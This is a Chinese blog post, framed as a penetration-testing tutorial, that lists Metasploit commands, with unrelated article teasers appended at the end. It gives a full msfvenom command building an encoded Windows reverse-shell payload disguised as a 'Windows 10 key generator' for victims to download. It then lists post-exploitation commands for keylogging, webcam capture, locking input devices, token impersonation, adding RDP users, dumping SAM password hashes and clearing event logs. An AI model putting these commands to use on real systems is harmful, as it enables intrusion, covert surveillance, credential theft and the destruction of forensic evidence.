渗透测试必备工具--Metasploit(流程梳理与meterpreter权限分析)

目录

一、攻击前期准备必会的命令(msf流程)

1、启动:msfdb run 或者 msfconsole

2、Payload生成:msfvenom

3、查找相关模块:search

4、选择使用模块:use

5、返回上一层:back 

6、查看需要设置的参数:show options

7、设置攻击参数:set

8、开始监听(攻击):exploit 或者 run

9、退出:exit

二、成功建立会话后常用命令

1、信息搜集

2、硬件控制(关机、键盘、鼠标、摄像头等)

3、权限提取

4、模块使用(sniffer抓包、incognito伪造token)

5、远程桌面

6、其他(查看补丁信息、执行文件、导出密码、清除日志)


关于msf的实际应用请参考我之前的博客

基于MSF控制同一热点(局域网)下的其他设备:http://t.csdnimg.cn/DAeeK

CVE-2019-0708远程桌面服务远程执行代码漏洞复现:http://t.csdnimg.cn/3DROz

CVE-2017-0143永恒之蓝复现:http://t.csdnimg.cn/D8UQn

基于Metasploit利于msfvenom生成恶意软件获取shell:http://t.csdnimg.cn/Lo4Ic

本篇博客主要介绍msf攻击前期准备的常用命令,以及成功建立meterpreter之后的常用命令。

(主要从拿到普通用户权限和管理员权限进行测试对比分析)

一、攻击前期准备必会的命令(msf流程)

1、启动:msfdb run 或者 msfconsole

2、Payload生成:msfvenom

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.29.69 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/win10密钥生成器.exe

msfvenom命令参数:

-p, --payload    <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定
-l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled    <length>        为payload预先指定一个NOP滑动长度
-f, --format     <format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder    [encoder]       指定需要使用的encoder(编码器)
-a, --arch       <architecture>  指定payload的目标架构
--platform   <platform>          指定payload的目标平台
-s, --space      <length>        设定有效攻击荷载的最大长度
-b, --bad-chars  <list>          设定规避字符集,比如: &#039;\x00\xff&#039;
-i, --iterations <count>         指定payload的编码次数
-c, --add-code   <path>          指定一个附加的win32 shellcode文件
-x, --template   <path>          指定一个自定义的可执行文件作为模板
-k, --keep                       保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options                列举payload的标准选项
-o, --out   <path>               保存payload
-v, --var-name <name>            指定一个自定义的变量,以确定输出格式
--shellest                       最小化生成payload
-h, --help                       查看帮助选项
--help-formats                   查看msf支持的输出格式列表

3、查找相关模块:search

search ms17-010 # 永恒之蓝

4、选择使用模块:use

use exploit/multi/handler # 很常用的一个模块

5、返回上一层:back 

6、查看需要设置的参数:show options

其中yes为必须设置的参数,no为可选项

7、设置攻击参数:set

set payload windows/meterpreter/reverse_tcp  # 针对Windows的一个常用攻击载荷

一般还需要设置监听IP(本地主机)和靶机的IP地址:即LHOST和RHOST

8、开始监听(攻击):exploit 或者 run

9、退出:exit

二、成功建立会话后常用命令

查看可执行的操作:help

1、信息搜集

getpid # 获取当前进程的pid

getuid # 查看权限

sysinfo # 查看目标机系统信息

ps # 查看当前活跃进程,kill <PID值> 杀死进程

idletime # 查看目标机闲置时间

shell # 进入目标机cmd shell

如果攻击的是不同操作系统则会出现乱码,我们需要切换编码,使用命令:chcp

控制台的页面编码有很多,常见的主要是65001和936

chcp 65001

2、硬件控制(关机、键盘、鼠标、摄像头等)

reboot / shutdown # 重启/关机

uictl [enable/disable] [keyboard/mouse/all] # 开启或禁止键盘/鼠标

uictl disable mouse # 禁用鼠标

uictl disable keyboard # 禁用键盘

keyscan_start # 开始键盘记录

keyscan_dump # 导出记录数据

keyscan_stop # 结束键盘记录

webcam_list # 查看摄像头

webcam_snap # 通过摄像头拍照,配合参数-i 指定要使用的网络摄像头的索引号

webcam_stream # 通过摄像头开启视频,同样可以使用 -i 参数来指定调用的摄像头

3、权限提取

getsystem # 提权 普通用户使用该方式提权失败概率很高,相反管理员用户提权非常容易。

下面先以普通用户权限测试

可以看到getsystem提权失败

如果对方是以管理员身份运行我们的恶意程序,则可以提权成功:

4、模块使用(sniffer抓包、incognito伪造token)

use sniffer # 加载sniffer模块

sniffer_interfaces # 查看网卡

sniffer_start 2 # 选择网卡,开始抓包

sniffer_stats 2 # 查看状态

sniffer_dump 2 /tmp/lltest.pcap # 导出pcap数据包

sniffer_stop 2 # 停止抓包

use incognito # 加载incognito模块

list_tokens -u # 查看可用的token

我们先看普通用户权限下,根据告警提示可知我们无法伪造token

但是如果我们是管理员权限,就是可以的:

impersonate_token 'NT AUTHORITY\SYSTEM' # 假冒SYSTEM token

或者 impersonate_token NT\ AUTHORITY\SYSTEM # 不加单引号需使用\

execute -f cmd.exe -i –t # -t 使用假冒的token 执行

(靶机会弹出cmd窗口,如果靶机将其关掉,cmd也会断开)

或者直接shell(靶机无任何提示)

rev2self # 返回原始token

5、远程桌面

run getgui –h # 查看帮助

run getgui -e # 开启远程桌面

run getgui -u lltest2 -p 123456 # 添加用户

run post/windows/manage/enable_rdp # 开启远程桌面 

注意:在普通用户权限下是无法开启的,这里是管理员权限

run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 # 添加用户

enumdesktops # 查看可用的桌面

getdesktop # 获取当前meterpreter 关联的桌面

set_desktop # 设置meterpreter关联的桌面 -h查看帮助

screenshot # 截屏

run vnc # 使用vnc远程桌面连接

6、其他(查看补丁信息、执行文件、导出密码、清除日志)

execute # 在目标机中执行文件

execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互

run post/windows/gather/enum_patches # 查看补丁信息

run post/windows/gather/smart_hashdump # 从SAM导出密码哈希,需要SYSTEM权限

clearev # 清除windows中的应用程序日志、系统日志、安全日志

注意:这个也是需要管理员权限的

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/128942.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

猫罐头哪家好?宠物店自用的5款猫罐头推荐!猫咪嘎嘎炫~

亲爱的铲屎官们&#xff0c;你们是否会为猫咪选购猫罐头而感到烦恼&#xff1f;你们是否渴望了解哪些猫罐头在宠物界有着良好的口碑&#xff1f;猫罐头&#xff0c;作为猫咪日常饮食中的重要组成部分&#xff0c;其品质直接影响到猫咪的健康和幸福。 猫罐头哪家好&#xff1f;作…

go 引入包报错“构建约束排除‘D/...vendor/pkg包’”中所有的GO文件

解决方案&#xff1a; 方案一&#xff1a;没生效 go - 构建约束排除所有 Go 文件 - IT工具网 go modules - build constraints exclude all Go files in - Stack Overflow 方案二&#xff1a;生效&#xff0c;手动初始化创建一个目录 后续再研究原因&#xff0c;有明白的大…

边缘智能模型训练、推理的关键技术

目录 模型推理边缘智能模型推理的关键指标延迟&#xff08;Latency&#xff09;准确性&#xff08;Accuracy&#xff09;能效&#xff08;Energy&#xff09;隐私&#xff08;Privacy&#xff09;通讯/计算开销&#xff08;Comm/comp Overhead&#xff09; 关键技术模型压缩&am…

node插件MongoDB(三)—— 库mongoose 的使用和数据类型(一)

前言 提示&#xff1a;使用mongoose 的前提是你安装了node和 MongoDB。 mongoose 官网文档&#xff1a;http://mongoosejs.net/docs/index.html 文章目录 前言一、安装二、基本使用1. 打开bin目录的mongod.exe文件2. 基本使用的代码&#xff08;连接mongodb 服务&#xff09;3.…

LeetCode算法题解(回溯,难点)|LeetCode37. 解数独

LeetCode37. 解数独 题目链接&#xff1a;37. 解数独 题目描述&#xff1a; 编写一个程序&#xff0c;通过填充空格来解决数独问题。 数独的解法需 遵循如下规则&#xff1a; 数字 1-9 在每一行只能出现一次。数字 1-9 在每一列只能出现一次。数字 1-9 在每一个以粗实线分…

【C++ 学习 ㉟】- 异常详解

目录 一、C 异常处理的基本语法 1.1 - 抛出异常 1.2 - 检测和捕获异常 二、在函数调用链中异常栈展开的匹配原则 三、异常重新抛出 四、异常规范 五、C 标准异常体系 程序的错误大致可以分为以下三种&#xff1a; 语法错误&#xff1a;在编译和链接阶段就能发现&#xf…

<蓝桥杯软件赛>零基础备赛20周--第5周--杂题-2

报名明年4月蓝桥杯软件赛的同学们&#xff0c;如果你是大一零基础&#xff0c;目前懵懂中&#xff0c;不知该怎么办&#xff0c;可以看看本博客系列&#xff1a;备赛20周合集 20周的完整安排请点击&#xff1a;20周计划 每周发1个博客&#xff0c;共20周&#xff08;读者可以按…

Java,多线程,线程的两种创建方式

首先是多线程的一些相关概念&#xff1a; 相关概念&#xff1a; 程序&#xff08;program&#xff09;&#xff1a;为完成特定任务&#xff0c;用某种语言编写的一组指令的集合。即指一段静态&#xff08;指不在执行中&#xff09;的代码。 进程&#xff08;process&#xf…

Qt QTableWidget表格的宽度

默认值 QTableWIdget的表格宽度默认是一个给定值&#xff0c;可以手动调整每列的宽度&#xff0c;也不填满父窗口 MainWindow::MainWindow(QWidget *parent): QMainWindow(parent) {this->resize(800,600);QStringList contents{"11","111111111111",&…

聊聊模板引擎<Template engine>

模板引擎是什么 模板引擎是一种用于生成动态内容的工具&#xff0c;通常用于Web开发中。它能够将静态的模板文件和动态数据结合起来&#xff0c;生成最终的HTML、XML或其他文档类型。模板引擎通过向模板文件中插入变量、条件语句、循环结构等控制语句&#xff0c;从而实现根据…

操作系统:输入输出管理(一)系统概述与设备独立性软件

一战成硕 5.1 I/O系统概述5.1.1 I/O设备5.1.2 I/O控制方式5.1.3 I/O软件层次结构5.1.4 应用程序的I/O接口 5.2 设备独立性软件5.2.1 与设备无关的软件5.2.2 高速缓存与缓冲区5.2.3 设备分配与回收5.2.4 spooling技术&#xff08;假脱机技术&#xff09; 5.1 I/O系统概述 5.1.1…

一分钟秒懂人工智能对齐

文章目录 1.什么是人工智能对齐2.为什么要研究人工智能对齐3.人工智能对齐的常见方法 1.什么是人工智能对齐 人工智能对齐&#xff08;AI Alignment&#xff09;指让人工智能的行为符合人的意图和价值观。 人工智能系统可能会出现“不对齐”&#xff08;misalign&#xff09;…

【EI会议征稿】JPCS独立出版-第五届新材料与清洁能源国际学术会议(ICAMCE 2024)

JPCS独立出版-第五届新材料与清洁能源国际学术会议&#xff08;ICAMCE 2024&#xff09; 2024 5th International Conference on Advanced Material and Clean Energy 第五届新材料与清洁能源国际学术会议&#xff08;ICAMCE 2024&#xff09;将于2024年2月23-25日在中国▪长沙…

电机应用-无刷直流电机

无刷直流电机 无刷直流电机&#xff08;Brushless Dirent Current Motor&#xff0c;简称BLDCM&#xff09;由电动机主体和驱动器组成&#xff0c;无电刷和无换向器&#xff0c;是除了有刷电机外用得最多的一种电机。 无刷直流电机不使用机械的电刷装置&#xff0c;采用方波自控…

带你一分钟看懂 “kubernetes”

目录 什么是 Kubernetes Kubernetes 概述 为什么需要 Kubernetes&#xff0c;它能做什么&#xff1f; 什么是 Kubernetes 从官方网站上可以看到&#xff0c;它是一个工业级的容器编排平台。Kubernetes 这个单词是希腊语&#xff0c;它的中文翻译是“舵手”或者“飞行员”。在…

NFT Insider112:Gucci Cosmos LAND亮相 The Sandbox,和YGG一起探索Web3增长新方式

引言&#xff1a;NFT Insider由NFT收藏组织WHALE Members(https://twitter.com/WHALEMembers)、BeepCrypto&#xff08;https://twitter.com/beep_crypto&#xff09;联合出品&#xff0c;浓缩每周NFT新闻&#xff0c;为大家带来关于NFT最全面、最新鲜、最有价值的讯息。每期周…

0基础制作产品图册的干货,一个网站即可

很多朋友想要制作产品图册&#xff0c;但是不知道如何入手&#xff0c;其实制作产品图册并不难&#xff0c;一个网站就可以搞定。下面就为大家分享一些干货&#xff0c;帮助大家快速入门。 首先&#xff0c;我们需要选择一个合适的网站。比如FLBOOK在线制作电子杂志平台。这个网…

【chat】3: ubutnu 安装mysql-8

如何在 Ubuntu 20.04 上安装 MySQLC搭建集群聊天室&#xff08;七&#xff09;&#xff1a;MySQL数据库配置 及项目工程目录配置 大神是centos的. apt 安装 rootk8s-master-2K4G:~# sudo apt install mysql-server Reading package lists... Done Building dependency tree Re…

SQL触发器

触发器是与表有关的数据库对象。 在insert/update/delete之前(BEFORE)或之后(AFTER)&#xff0c;触发并执行触发 器中定义的SQL语句集合。 触发器的这种特性可以协助应用在数据库端确保数据的完整性, 日志记录 , 数据校验等操作 。 使用别名OLD和NEW来引用触发器中发生变化的…

Google play提高上包率——如何防止封号、拒审、下架?

Google Play是全球最大的移动应用商店之一&#xff0c;它是运行Android操作系统的设备的官方应用商店。它提供各种数字内容&#xff0c;包括应用程序&#xff08;应用&#xff09;、游戏、音乐、书籍等&#xff0c;包括免费和付费选项。这也为许多游戏/APP出海的企业或开发者提…